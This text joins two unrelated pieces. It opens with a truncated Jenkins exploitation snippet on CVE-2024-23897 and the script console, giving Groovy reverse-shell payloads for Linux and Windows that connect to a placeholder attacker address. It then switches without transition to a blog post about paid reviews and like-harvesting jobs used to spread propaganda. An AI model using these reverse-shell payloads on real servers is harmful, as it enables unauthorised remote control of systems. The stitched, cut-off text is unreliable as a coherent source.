Exploiting Jenkins / CVE-2024-23897 Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script If you don't have access to script console and the version is vulnerable to CVE-2024-23897 , then exploit it to read files and get authentication credentials for Jenkins, (explained below) Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script. For Linux, r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() For Windows, String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea...
Most of us, before buying a product from Amazon/Flipkart, or before booking a movie ticket, we might go through the review section to see what others think about it, how good it is?, what are the pros and cons? etc.
Let me tell you a fact. Though there are genuine reviews written by genuine customers/users, majority of the reviews are paid reviews. Similarly paid opinions can be seen in forums like Quora, Yahoo Answers.When it comes to social networking websites, there are big companies working for corporate, political parties, ideological institutions.
Many of us are addicted to these social networking sites and we like and share things which we are not sure about. All want to monetize their profit and for that they will do even the worst methods to make things viral.These institutions pay millions of money to distribute and publicize their propaganda. In short, to brainwash the audience.
When thousands write a good review of a bad product, that product automatically becomes good in the public.
Most of the companies are running affiliate programs. Which means, you promote us and if someone buys a product through you, we will give a commission to you. One of the Site defines it's affiliate program as,
"You can use various promotional methods to earn easy commissions including placing banners, links, and writing product reviews on your website or blog. You will receive customized links for all the promotions, through which we will track sales. When any customer, referred by you, makes a purchase, you get paid."
There are plenty of online job sites serves over the internet. If you signup, you can see many online job offerings such as harvesting likes,up-votes, review writings, data entry etc.
It's funny that, you don't even need to find words to write a review. The review content is also provided by the marketing company and all you need to do is copy and paste it on relevant blogs, forums websites under your account (even from multiple accounts).
I have taken few screenshots from one of those site. Lets go through that and understand how companies can brainwash you with reviews and posts. When thousands write a good review of a bad product, that product automatically becomes good in the public.
The following screenshots are job advertisements , the employer is paying money to publicize their hashtag and their product.
 |
| Another job, the worker need to signup, comment and give a link to the product website. |
 |
| See the instructions. Just follow this and get paid. Spread the propaganda, or publicize a product no matter how good or bad it is. |
 |
| This job is to do the up-votes..lol. |
Due to the large influence of Social Networking sites on common people, any one can throw money to circulate and publicize their propaganda. Even the Visual medias are also working like that.
So with this article, i remind each and everyone that Use your Brain, Think and Act. Don't blindly believe everything on the Internet. Don't blindly believe in what others says.